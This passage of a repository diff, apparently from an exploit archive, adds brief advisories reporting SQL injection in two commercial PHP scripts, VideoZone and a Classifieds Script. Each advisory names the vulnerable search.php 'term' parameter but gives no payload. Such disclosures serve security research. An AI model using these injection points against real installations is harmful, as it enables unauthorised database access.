# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: VideoZone - Video Site Creator Script
|
||||||
|
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-videozone-video-site-creator/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
14
platforms/php/webapps/41127.txt
Executable file
14
platforms/php/webapps/41127.txt
Executable file
|
@ -0,0 +1,14 @@
|
||||||
|
# # # # #
|
||||||
|
# Vulnerability: SQL Injection
|
||||||
|
# Date: 19.01.2017
|
||||||
|
# Vendor Homepage: http://www.scriptfolder.com/
|
||||||
|
# Script Name: Classifieds Script
|
||||||
|
# Script Buy Now:http://www.scriptfolder.com/scriptfolder-classifieds/
|
||||||
|
# Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# http://localhost/[PATH]/search.php?term=[SQL]
|
||||||
|
# E.t.c....
|
||||||
|
# # # # #
|
Loading…
Add table
Reference in a new issue